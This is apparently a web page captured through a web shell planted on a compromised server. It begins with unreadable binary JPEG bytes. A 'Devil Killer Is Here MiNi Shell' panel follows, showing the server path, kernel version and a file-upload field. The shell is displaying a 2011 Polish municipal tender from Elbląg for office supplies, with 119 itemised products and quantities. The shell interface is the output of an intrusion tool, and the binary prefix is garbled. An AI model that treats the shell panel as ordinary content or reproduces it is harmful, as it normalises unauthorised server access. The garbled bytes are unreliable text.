JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110202/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110202/38789-N-2011.html

<p class="kh_header"><b>Elbląg: Dostawa materiałów biurowych.</b><br>
<b>Numer ogłoszenia: 38789 - 2011; data zamieszczenia: 02.02.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina - Miasto Elbląg , ul. Łączności 1, 82-300 Elbląg, woj. warmińsko-mazurskie, tel. 55 235 35 36, 55 239 31 25, faks 55 239 33 34.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.umelblag.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa materiałów biurowych..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest:

Dostawa materiałów biurowych.

Przedmiot główny:
Nazewnictwo wg CPV:	Papier do drukowania
 
Przedmioty dodatkowe:
Nazewnictwo wg CPV:	Różny sprzęt i artykuły biurowe

Nazewnictwo wg CPV:	Części i akcesoria do maszyn biurowych

Nazewnictwo wg CPV:	Skoroszyty i podobne wyroby

Nazewnictwo wg CPV:	Rejestry, księgi rachunkowe, skoroszyty, formularze i inne wyroby piśmiennicze z papieru lub tektury

Przedmiot i zakres zamówienia obejmuje dostawę z podziałem na dwa etapy dostawy niżej wymienionych materiałów biurowych:
1. 	BLOK TECHNICZNY A4 biały - 20 kartek w bloku.papier o gramaturze 180g/m2, - ilość razem 30, ilość w I etapie 30, ilość w II etapie 0
2. 	BLOK z makulatury o formacie A4 - 50 kartek w bloku. - ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
3. 	BLOK z makulatury o formacie A5 - 50 kartek w bloku.- ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
4. 	BLOK do flipcharta o wymiarach 1000x650mm w kratkę, 20 kartek w bloku, z otworami w górnej części pozwalającymi na zamontowanie do uniwersalnych uchwytów. - ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
5. 	CIENKOPIS do pisania na płytach CD-R oraz na foliach czarny S=0,4mm - szybkoschnący. - ilość razem 40, ilość w I etapie 20, ilość w II etapie 20
6. 	CIENKOPIS - CZARNY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, odporny na wysychanie tusz, obudowa wraz z zatyczką  sześciokątna. - ilość razem 500, ilość w I etapie 300, ilość w II etapie 200
7. 	CIENKOPIS - CZERWONY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, odporny na wysychanie tusz, obudowa  wraz z zatyczką sześciokątna. - ilość razem 400, ilość w I etapie 200, ilość w II etapie 200
8. 	CIENKOPIS - NIEBIESKI, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka, odporny na wysychanie tusz, obudowa wraz z zatyczką  sześciokątna. - ilość razem 400, ilość w I etapie 200, ilość w II etapie 200
9. 	CIENKOPIS - ZIELONY, gr. linii 0,4mm, końcówka oprawiona w metal, wentylowana skuwka,  odporny na wysychanie tusz, obudowa wraz z zatyczką  sześciokątna. - ilość razem 400, ilość w I etapie 200, ilość w II etapie 200
10. 	DŁUGOPIS Zenith 10 - automatyczny, metalowe wykończenia, z wkładem metalowym, wielkopojemnym. - ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
11. 	DŁUGOPIS na sprężynce - Z WYMIENNYM WKŁADEM O DŁ. 130MM, PODSTAWKA PRZYKLEJANA DO PODŁOŻA, PRZEZROCZYSTA OBUDOWA UMOŻLIWIA KONTROLĘ ZUŻYCIA, ISTNIEJE MOŻLIWOŚĆ REGULACJI NACHYLENIA UMIESZCZANIA DŁUGOPISU,  SPRĘŻYKA ODPORNA NA ROZCIĄGNIĘCIA. - ilość razem 200, ilość w I etapie 100, ilość w II etapie 100
12. 	DZIURKACZ ESSELTE D25, metalowy, wyposażony we wskaźnik środka strony oraz listwę formatową A4,A5,A6,rozstaw dziurek 80mm, średnica otworu 5,5mm, do jednoraz. dziurkowania 25 kartek - ilość razem 30, ilość w I etapie 30, ilość w II etapie 0
13. 	ETYKIETY białe, matowe na płyty CD,  samoprzylepne, na arkuszu 2 etykiety o średnicy 117 mm  - w szt. arkuszy. - ilość razem 70, ilość w I etapie 70, ilość w II etapie 0
14. 	ETYKIETY TERMICZNE do drukarki ZEBRA GK 420 d o wymiarach 50 mm x 30 mm -  w rolkach po 1000 szt. - ilość razem 350, ilość w I etapie 350, ilość w II etapie 0
15.	 FOLIA do plotera  HP DJ 800 MATOWA 75MY. 0.914X20M. - ilość razem 6, ilość w I etapie 6, ilość w II etapie 0
16. 	GRAFITY Hi-Polymer do ołówków PENTEL 0,5 B - małe opakowania - ilość razem 12, ilość w I etapie 12, ilość w II etapie 0
17. 	GRAFITY Hi-Polymer do ołówków PENTEL 0,5 2B - małe opakowania - ilość razem 12, ilość w I etapie 12, ilość w II etapie 0
18. 	GRAFITY Hi-Polymer do ołówków PENTEL  0,5 HB - małe opakowania - ilość razem 150, ilość w I etapie 150, ilość w II etapie 0
19. 	GRZBIETY DO BINDOWANIA 14 MM - NIEBIESKIE W SZT. - ilość razem 200, ilość w I etapie 200, ilość w II etapie 0
20. 	GRZBIETY DO BINDOWANIA 19 MM - ZIELONE W SZT. - ilość razem 200, ilość w I etapie 200, ilość w II etapie 0
21. 	GUMKI RECEPTURKI - WYTRZYMAŁE I ELASTYCZNE o średnicy 70 mm, grubość 1,5 mm, szerokość 2mm - w opak.100G. - ilość razem 60, ilość w I etapie 60, ilość w II etapie 0
22.	GUMKA polymerowa o wymiarach nie mniejszych niż 3,5x1,6x1,2 cm. - ściera ołówek i grafit nie naruszając struktury papieru, nie brudzi, posiada ruchomą kartonową osłonę. - ilość razem 200, ilość w I etapie 200, ilość w II etapie 0
23. 	IDENTYFIKATORY ze smyczą i klipsem do przypinania w dwóch położeniach, wykonane ze sztywnego przezroczystego tworzywa - w szt. o wym.7,5 x 11, 4 cm. Dla celów bezpieczeństwa smycz posiada specjalny plastikowy zamek otwierający się w razie silnego pociągnięcia. - ilość razem 100, ilość w I etapie 100, ilość w II etapie 0
24. 	KALKULATOR - duży wyświetlacz, podwójna pamięć, zaokrąglanie wyników, obliczanie marży, klawisz podwójnego zera, klawisz cofania, o wym. nie mniejszych niż 20 cm x 15,5 cm, gwarancja 24 miesiące - ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
25. 	KLEJ SZTYFT BANTEX - minimum 22 g, do klejenia papieru, zdjęć, tektury, tkaniny i innych materiałów. Użyty klej wysycha natychmiast nie powodując marszczenia papieru. - ilość razem 400, ilość w I etapie 300, ilość w II etapie 100
26. 	KOPERTA C4 biała samoklejąca z paskiem (229x324mm) - w szt. - ilość razem 12 000, ilość w I etapie 6 000, ilość w II etapie 6 000
27.	KOPERTA B5 biała samoklejąca z paskiem (176x250mm) - w szt. - ilość razem 18 000, ilość w I etapie 9 000, ilość w II etapie 9 000
28. 	KOPERTA DL biała, samoprzylepna, bez okienka (110x220mm) - w szt. - ilość razem 100 000, ilość w I etapie 50 000, ilość w II etapie 50 000
29. 	KOPERTA C6 biała, samoprzylepna (114x162mm) - w szt. - ilość razem 70 000, ilość w I etapie 40 000, ilość w II etapie 30 000
30. 	KOPERTA z zabezpieczeniem powietrznym AIR POC o wym. zew. 170x225mm - w szt.- ilość razem 150, ilość w I etapie 150, ilość w II etapie 0
31. 	Koperta z poszerzonymi bokami i dnem o wym.255x390x40 w szt. - ilość razem 1 000, ilość w I etapie 500, ilość w II etapie 500
32. 	KOREKTOR W PIÓRZE HANDY BIAŁY. Zawiera szybkoschnący, ekologiczny tusz. Pisze precyzyjną, z metalową końcówką w ergonomicznej obudowie płaskiej lub okrągłej. Pojemność 7 ml. - ilość razem 150, ilość w I etapie 150, ilość w II etapie 0
33. 	KOREKTOR W PŁYNIE  HANDY, buteleczka 20 ml, z pędzelkiem, szybkoschnący ekologiczny tusz, biały. - ilość razem 100, ilość w I etapie 100, ilość w II etapie 0
34. 	KOSZULKA  A4  z folii o gr. 50 mikronów, krystaliczna, w opak. 100 szt. - ilość razem 120, ilość w I etapie 60, ilość w II etapie 60
35. 	LINIJKA 20 cm - plastikowa, przezroczysta. - ilość razem 40, ilość w I etapie 40, ilość w II etapie 0
36. 	LINIJKA 30 cm - plastikowa, przezroczysta. - ilość razem 40, ilość w I etapie 40, ilość w II etapie 0
37. 	LINIJKA SKALÓWKA trójkątna z podziałką do skalowania  - SKALA1:2,5,  1:5, 1:10, 1:20, 1:50, 1:100 - ilość razem 1, ilość w I etapie 1, ilość w II etapie 0
38. 	MAGNESY DO TABLICY MAGNETYCZNEJ suchościeralnej o śred.2 cm - w szt.- ilość razem 12, ilość w I etapie 12, ilość w II etapie 0
39. 	MARKER  permanentny, wodoodporny, nie zawiera ksylenu, może pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, czarny. - ilość razem 80, ilość w I etapie 40, ilość w II etapie 40
40. 	MARKER  permanentny, wodoodporny, nie zawiera ksylenu, może pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, czerwony. - ilość razem 60, ilość w I etapie 30, ilość w II etapie 30
41. 	MARKER  permanentny, wodoodporny, nie zawiera ksylenu, może pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, niebieski. - ilość razem 60, ilość w I etapie 30, ilość w II etapie 30
42. 	MARKER  permanentny, wodoodporny, nie zawiera ksylenu, może pozostawać bez skuwki do 14 dni i nie wyschnie; gr. linii 2mm, okrągła końcówka, zielony. - ilość razem 60, ilość w I etapie 30, ilość w II etapie 30
43. 	MARKER olejowy - biały szybkoschnący, nie zawiera ksylenu, gr.linii  pisania 1mm, pisze po każdej powierzchni, odporny na ścieranie, działanie wody i światła. - ilość razem 10, ilość w I etapie 5, ilość w II etapie 5
44. 	MARKER olejowy - czarny, szybkoschnący, nie zawiera ksylenu, gr.linii  pisania 1mm, pisze po każdej powierzchni, odporny na ścieranie, działanie wody i światła. - ilość razem 10, ilość w I etapie 5, ilość w II etapie 5
45. 	Markery do tablic suchościeralnych - w kompletach.  W komplecie  4 szt./4 kolory/. - ilość razem 2, ilość w I etapie 2, ilość w II etapie 0
46. 	MAZAKI - flamastry 12 kolorów - w kpl. - ilość razem 10 - ilość w I etapie 5 - ilość w II etapie 5
47. 	NOTES KOSTKA do przyborników BIAŁA klejona 83 x 83 mm x 500 kartek -  w kostkach - ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
48. 	NOTES samoprzylepny - w bloczku 100 karteczek w żółtym kolorze  o wym. 38 x 51 mm. - ilość razem 500, ilość w I etapie 500, ilość w II etapie 0
49. 	NOTES samoprzylepny - w bloczku 100 karteczek w żółtym kolorze  o wym. 76 x 76 mm. - ilość razem 500, ilość w I etapie 500, ilość w II etapie 0
50. 	NOZYCZKI klasyczne całe metalowe ze stali nierdzewnej - 20 cm - ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
51. 	NOTES ze skorowidzem na telefony - wym.12cm x 21cm - ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
52. 	OFERTÓWKA A4 przezroczysta, wykonana z folii PCV o gr. 150 mikr. - w szt. - ilość razem 600, ilość w I etapie 600, ilość w II etapie 0
53. 	OKŁADKI NIEBIESKIE I ZIELONE do bindowania A4 CHROMOLUX - w opak. po 100 szt., grubość 250g/m2. - ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
54. 	OKŁADKA PRZEZROCZYSTA bezbarwna do bindowania 0,20 mm  A4 - w opak. po 100 szt.- ilość razem 24, ilość w I etapie 24, ilość w II etapie 0
55. 	OŁÓWEK AUTOMATYCZNY STAEDTLER 774 - gr.linii 0,5 mm , z metalową końcówką, z metalowym zasobnikiem zabezpieczającym na grafity, mechanizm ołówka gwarantuje zużycie grafitu aż w 95%, posiada długą, regulowaną gumkę. - ilość razem 100 - ilość w I etapie 100, ilość w II etapie -0
56. 	OŁÓWEK o twardości HB z gumką okrągły, zaostrzony, drewniany. - ilość razem 300, ilość w I etapie 300, ilość w II etapie 0
57. 	PAPIER FOTOGRAFICZNY OFFICE DEPOT A4, powlekany papier błyszczący o wysokiej białości, gramatura 180 g/m2, do drukarek atramentowych, w arkuszach. - ilość razem 100, ilość w I etapie 100, ilość w II etapie 0
58. 	PAPIER DO PLOTERA  HP  DJ 800 50/90G/M2 0,914X45 M -  w rolkach.- ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
59. 	PAPIER samoprzylepny A4 - w szt. ŻÓŁTY- ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
60. 	PAPIER samoprzylepny A4 - w szt. ZIELONY- ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
61. 	PAPIER samoprzylepny A4 - w szt. POMARAŃCZ.- ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
62. 	PAPIER samoprzylepny A4 - w szt. BIAŁY- ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
63. 	PAPIER WIZYTÓWKOWY BIAŁY A4 - 4 różne rodzaje faktury papieru gr. 230g/m2 - w szt.- ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
64. 	PAPIER DO DRUKU DYPLOMÓW A4 ZIELONY MARMUREK - gr. 200 g/m2 - w szt. - ilość razem 300, ilość w I etapie 300, ilość w II etapie 0
65. 	PAPIER DO DRUKU DYPLOMÓW A4 BEŻOWY MARMUREK - gr. 200 g/m2 - w szt. - ilość razem 300, ilość w I etapie 300, ilość w II etapie 0
66. 	PAPIER XERO  kolorowy  o formacie A4, gramatura 80g/m2 -POMARAŃCZOWY- w ryzach po 500 ark. - ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
67. 	PAPIER XERO kolorowy o formacie A4, gramatura 80g/m2- ZIELONY/jasny/ - w ryzach po 500 ark. - ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
68. 	PAPIER XERO kolorowy o formacie A4, gramatura 80g/m2 - ŻÓŁTY- w ryzach po 500 ark. - ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
69. 	PAPIER XERO POLLUX  A3, gramatura 80 g/m2, o białości nie mniejszej niż CIE 161 - w ryzach po 500 ark. - ilość razem 120, ilość w I etapie 60, ilość w II etapie 60
70. 	PAPIER XERO  POLLUX A4, gramatura 80 g/m2, o białości nie mniejszej niż CIE 161 - w ryzach po 500 ark. - ilość razem 6 800, ilość w I etapie 3 400, ilość w II etapie 3 400
71. 	PINEZKI zwykłe - małe pudełka po 100 szt. - w szt. pudełek. - ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
72. 	PINEZKI kołeczki - w opak. po 200 szt. - ilość razem 5, ilość w I etapie 5, ilość w II etapie 0
73. 	PIÓRO ŻELOWE UNI-BALL SIGNO 0,5 - Uni UM-100, PRZEZROCZYSTA OBUDOWA Z METALIZOWANĄ KOŃCÓWKĄ - Z WYMIENNYM WKŁADEM, TUSZ WODOODPORNY I NIE BLAKNĄCY W ŚWIETLE SŁONECZNYM, PISZE CIENKO I BEZ PRZERYWANIA, GRUB. LINII PISANIA OK. 0,3 MM, ŚREDNICA KULKI PISZĄCEJ OK.5 MM. WYPOSAŻONE W PRZEZROCZYSTĄ ZATYCZKĘ Z OZNACZENIEM KOLORU WKŁADU, /czarne i niebieskie/. - ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
74. 	PODUSZKI do pieczątek - CZERWONE o wym.11cmx7cm - ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
75. 	PODUSZKI do pieczątek - CZERWONE o wym.20cmx12cm - ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
76. 	PRZEKŁADKI PLASTIKOWE do segregatora A4 w kompletach - w 1 kpl. 10 kolorowych przekładek. - ilość razem 60, ilość w I etapie 60, ilość w II etapie 0
77. 	ROLKA KASOWA TERMICZNA szer.57 mm dł. 30 mb. - ilość razem 200, ilość w I etapie 100, ilość w II etapie 100
78. 	ROLKA TERMICZNA do kasy fiskalnej 28 mmx 30m - ilość razem 30, ilość w I etapie 30, ilość w II etapie 0
79. 	ROZSZYWACZ do zszywek. - ilość razem 40, ilość w I etapie 40, ilość w II etapie 0
80. 	SEGREGATOR A5  szerokość grzbietu 7 cm, oklejony na zewnątrz i wewnątrz folią PCV, wzmocnione krawędzie dolne. - ilość razem 10, ilość w I etapie 10, ilość w II etapie 0
81. 	SEGREGATOR A4  szerokość grzbietu 5 cm, oklejony na zewnątrz folią PP, wewnątrz biała nabłyszczana wyklejka papierowa, dolne krawędzie wzmocnione metalową szyną. - ilość razem 300, ilość w I etapie 150, ilość w II etapie 150
82. 	SEGREGATOR A4  szerokość grzbietu 7,5 cm, oklejony na zewnątrz folią PP, wewnątrz wyklejka papierowa, dolne krawędzie wzmocnione metalową szyną. - ilość razem 800, ilość w I etapie 400, ilość w II etapie 400
83. 	SEGREGATOR A4 archiwizacyjny, szer.grzbietu 8 cm, wykonany z tektury o gr.2mm, w kolorze naturalnego kartonu. - ilość razem 50, ilość w I etapie 50, ilość w II etapie 0
84. 	SKOROSZYT Z ZAWIESZKĄ  A 4 -połówka, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt. - ilość razem 300, ilość w I etapie 150, ilość w II etapie 150
85. 	SKOROSZYT plastikowy A4 - przednia okładka przezroczysta, tylna kolorowa z metalowym wąsem, na grzbiecie pasek do opisu - ilość razem 500, ilość w I etapie 250, ilość w II etapie 250
86. 	SKOROSZYT PCV A4 z europerforacją, pojemność 2 cm, dwustronnie zapisywalny pasek brzegowy. Dziurkowanie: 11/euro pozwala na wpięcie do każdego segregatora, przednia okładka przezroczysta, tylna kolorowa z metalowym wąsem. - ilość razem 1 400, ilość w I etapie 700, ilość w II etapie 700
87. 	SKOROSZYT zwykły A4 z fałdą poprawiającą sztywność grzbietu, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt - ilość razem 4 000, ilość w I etapie 2 000, ilość w II etapie 2 000
88. 	SKOROSZYT oczkowy A4 z otworami pozwalającymi na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt. - ilość razem 5 000, ilość w I etapie 2 500, ilość w II etapie 2 500
89. 	SKOROSZYT zaczepowy A4- z zawieszką pozwalającą na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt. - ilość razem 700, ilość w I etapie 350, ilość w II etapie 350
90. 	SKOROSZYT oczkowy A4-połówka,z otworami pozwalającymi na wpięcie do segregatora, wykonany z kartonu 280 g/m2 w kolorze białym, z metalowym wąsem umożliwiającym wpinanie akt. - ilość razem 500, ilość w I etapie 250, ilość w II etapie 250
91. 	SKOROWIDZ A4 alfabetyczny, 96 kartek w kratkę. - ilość razem 30, ilość w I etapie 30, ilość w II etapie 0
92. 	SKOROWIDZ A5 alfabetyczny, 96 kartek w kratkę. - ilość razem 40, ilość w I etapie 40, ilość w II etapie 0
93. 	SPINACZE BIUROWE 25 mm, trójkątne, srebrne - w opakowaniach po 100 szt. Spinaczy. - ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
94. 	SPINACZE BIUROWE 50 mm, owalne, srebrne w opakowaniach po 100 szt. spinaczy - ilość razem 200, ilość w I etapie 200, ilość w II etapie 0
95. 	SPINACZE KLIPSY  25 mm -  w szt. - ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
96. 	SPINACZE KLIPSY  32 mm -  w szt. - ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
97. 	SZNUREK jutowy do pakowania - w kłębkach 10 dkg. - ilość razem 250, ilość w I etapie 250, ilość w II etapie 0
98. 	SKŁADANKA - papier komputerowy 210x12x2, 6 CALI , oryginał -kolor biały, kopia - różowa,  900 składek/karton. - ilość razem 30, ilość w I etapie 15, ilość w II etapie 15
99. 	TABLICA KORKOWA o wym. 30 X 45  cm z ramą drewnianą. - ilość razem 4, ilość w I etapie 4, ilość w II etapie 0
100. TABLICA KORKOWA o wym. 90 X 60 cm z ramą drewnianą. Tablicę można zawiesić na ścianę w układzie pionowym lub poziomym. - ilość razem 4, ilość w I etapie 4, ilość w II etapie 0
101. TACKI NA DOKUMENTY - plastikowe, przezroczyste o wymiarach 350x245x60mm - ilość razem 40, ilość w I etapie 40, ilość w II etapie 0
102. TAŚMA KLEJACA 3/4 przezroczysta (szpula 18mm x 20 m) - ilość razem 400, ilość w I etapie 400, ilość w II etapie 0
103. TAŚMA KLEJĄCA PAKOWA o szer.50mm dł 66m - ilość razem 50, ilość w I etapie 50, ilość w II etapie 0
104. TAŚMA dwustronnie klejąca szer. 38mm dł.10 m - ilość razem 17, ilość w I etapie 17, ilość w II etapie 0
105. TECZKA DO PODPISU A4, z 12 przekładkami , wykonana z mocnego kartonu powlekanego kolorową folią polipropylenową, na frontowej okładce okienko do opisu, harmonijkowy grzbiet zapewniający dużą pojemność. - ilość razem 20, ilość w I etapie 20, ilość w II etapie 0
106.	TECZKA WIĄZANA A4, wykonana z białego kartonu 280 g/m2, posiadająca trzy wewnętrzne klapy. - ilość razem 1 600, ilość w I etapie 800, ilość w II etapie 800
107. TECZKA kartonowa A4 z narożnymi gumkami, wykonana z białego kartonu 280 g/m2, z trzema wewnętrznymi klapami. - ilość razem 800, ilość w I etapie 400, ilość w II etapie 400
108.	TECZKA jednostronnie lakierowana kolorowa A4 z mocnego kartonu 280 g/m2 z gumkami narożnymi w kolorze teczki. - ilość razem 300, ilość w I etapie 150, ilość w II etapie 150
109.	TECZKA z gumką VauPE- DWUSTRONNIE BARWIONA, laminowana kolorową folią polipropylenową, tektura twarda 1 mm, grzbiet 10 mm. - ilość razem 100, ilość w I etapie 50, ilość w II etapie 50
110.	TEMPERÓWKA - metalowa, ze stalowym ostrzem mocowanym wkrętem, rowkowania w korpusie ułatwiają trzymanie. - ilość razem 60, ilość w I etapie 60, ilość w II etapie 0
111. TUSZ do pieczątek ręcznych i samotuszujących z gumową i polimerową płytką stemplującą - o pojemności 25 ml czerwony - ilość razem 100, ilość w I etapie 100, ilość w II etapie 0
112. TUSZ do pieczątek ręcznych i samotuszujących z gumową i polimerową płytką stemplującą - o pojemności 25 ml niebieski - ilość razem 2, ilość w I etapie 2, ilość w II etapie 0
113. WKŁAD kulkowy 0,5 mm czarny do pióra PARKER VEKTOR - ilość razem 30, ilość w I etapie 15, ilość w II etapie 15
114. WKŁAD kulkowy 0,5 mm niebieski do pióra PARKER VEKTOR - ilość razem 30, ilość w I etapie 15, ilość w II etapie 15
115.	WKŁAD żelowy do długopisu PARKER - 0,7 niebieski - ilość razem 20, ilość w I etapie 10, ilość w II etapie -10
116. WKŁAD wielkopojemny metalowy do długopisu Zenith 10 - niebieski, ilość razem 200, ilość w I etapie 100 - ilość w II etapie 100
117. WKŁAD wielkopojemny metalowy do długopisu Zenith 10 - czarny - ilość razem 200, ilość w I etapie 100, ilość w II etapie 100
118. WKŁAD  do pióra żelowego  UNI-BALL SIGNO 0,5 - Uni UM-100 - czarny - ilość razem 400, ilość w I etapie 200, ilość w II etapie 200
119. WKŁAD  do pióra żelowego  UNI-BALL SIGNO 0,5 -  Uni UM-100 - niebieski - ilość razem 400, ilość w I etapie 200, ilość w II etapie 200
